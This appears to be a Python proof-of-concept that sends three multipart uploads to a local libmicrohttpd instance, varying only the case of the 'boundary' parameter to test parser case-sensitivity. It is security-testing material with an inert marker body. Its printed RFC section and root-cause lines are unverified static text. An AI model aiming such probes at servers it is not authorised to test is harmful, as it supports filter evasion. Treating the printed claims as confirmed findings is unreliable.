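#!/usr/bin/env python3
"""Check how an HTTP server treats the case of the multipart ``boundary`` parameter.

The script sends the same multipart/form-data POST three times to
``TARGET:PORT``, changing only the spelling of the parameter name in the
Content-Type header (``boundary=``, ``Boundary=``, ``BOUNDARY=``), and prints
the status line of each response.

How to read the output: the lowercase request is the control. If the two
variants get a different status line, the server matches the parameter name
case-sensitively. The status line alone does not show what the server did
with the body, and it does not demonstrate a bypass of anything; that claim
depends on another component (a proxy or upload filter in front of the
server) parsing the same header differently, which this script does not test.

The body is an inert marker string, and the default target is a local test
instance on the loopback interface.
"""
import socket
import time

TARGET = "127.0.0.1"
PORT = 8888
# Upper bound, in seconds, on connect and on each read, so that a server that
# keeps the connection open cannot make the script hang forever.
TIMEOUT = 5.0

# One multipart part delimited by BOUNDARY123. The bytes are identical for all
# three requests; only the Content-Type header differs between them.
BODY = (
    b"--BOUNDARY123\r\n"
    b"Content-Disposition: form-data; name=\"secret_file\"; filename=\"malware.exe\"\r\n"
    b"Content-Type: application/octet-stream\r\n"
    b"\r\n"
    b"MALICIOUS_PAYLOAD_DATA\r\n"
    b"--BOUNDARY123--\r\n"
)


def _build_request(content_type_header):
    """Return the raw HTTP/1.1 POST /upload request carrying BODY.

    ``content_type_header`` is written into the Content-Type header verbatim;
    in this script it is only ever one of the fixed strings passed by main().
    """
    head = (
        f"POST /upload HTTP/1.1\r\n"
        f"Host: {TARGET}:{PORT}\r\n"
        f"Content-Type: {content_type_header}\r\n"
        f"Content-Length: {len(BODY)}\r\n"
        f"Connection: close\r\n"
        f"\r\n"
    ).encode()
    return head + BODY


def send_raw(label, content_type_header):
    """Send one request with the given Content-Type value and print the status line.

    Args:
        label: Short tag printed above the result to identify the variant.
        content_type_header: Full value of the Content-Type header to send.

    Connection failures and timeouts are reported on the "Server response"
    line instead of aborting the run, so the remaining variants are still
    exercised and the three results can be compared side by side.
    """
    request = _build_request(content_type_header)
    chunks = []
    error = None
    try:
        # The context manager closes the socket on every path, including when
        # sendall() or recv() raises.
        with socket.create_connection((TARGET, PORT), timeout=TIMEOUT) as s:
            s.sendall(request)
            time.sleep(0.2)
            # "Connection: close" was sent, so the response is read until the
            # server closes its side.
            while True:
                chunk = s.recv(4096)
                if not chunk:
                    break
                chunks.append(chunk)
    except OSError as exc:  # refused connection, reset, or timeout
        error = exc

    resp = b"".join(chunks)
    if resp:
        # errors="replace": a malformed status line must not crash the report.
        status_line = resp.split(b"\r\n")[0].decode(errors="replace")
    elif error is not None:
        status_line = f"(no response: {error})"
    else:
        status_line = "(connection closed without a response)"

    print(f" [{label}]")
    print(f" Content-Type: {content_type_header}")
    print(f" Server response: {status_line}")
    print()


def main():
    """Run the control request and the two case variants, then print the summary."""
    # NOTE(review): the RFC citation printed below is the author's. The rule
    # that Content-Type parameter names match case-insensitively appears to be
    # RFC 2045 §5.1, and the multipart boundary parameter is defined in
    # RFC 2046 §5.1.1 -- confirm the section before quoting it in a report.
    print("=" * 60)
    print("libmicrohttpd boundary= case-sensitivity bypass PoC")
    print("RFC 2046 §4.1 violation in postprocessor.c:82")
    print("=" * 60)
    print()

    # Control: the spelling the server is expected to accept.
    print("--- NORMAL REQUEST (boundary= lowercase) ---")
    send_raw("boundary=", "multipart/form-data; boundary=BOUNDARY123")
    time.sleep(0.3)

    # Variants: same request, parameter name in a different case.
    print("--- ATTACK REQUEST 1 (Boundary= capitalized) ---")
    send_raw("Boundary=", "multipart/form-data; Boundary=BOUNDARY123")
    time.sleep(0.3)

    print("--- ATTACK REQUEST 2 (BOUNDARY= all caps) ---")
    send_raw("BOUNDARY=", "multipart/form-data; BOUNDARY=BOUNDARY123")
    time.sleep(0.3)

    # The summary is static text; it is printed regardless of what the server
    # answered, so compare the three status lines above before relying on it.
    print("ROOT CAUSE: postprocessor.c:82 strstr(boundary, \"boundary=\")")
    print("Developer TODO: /* Q: should this be strcasestr? */")
    print("Fix: case-insensitive search per RFC 2046 §4.1")


if __name__ == "__main__":
    main()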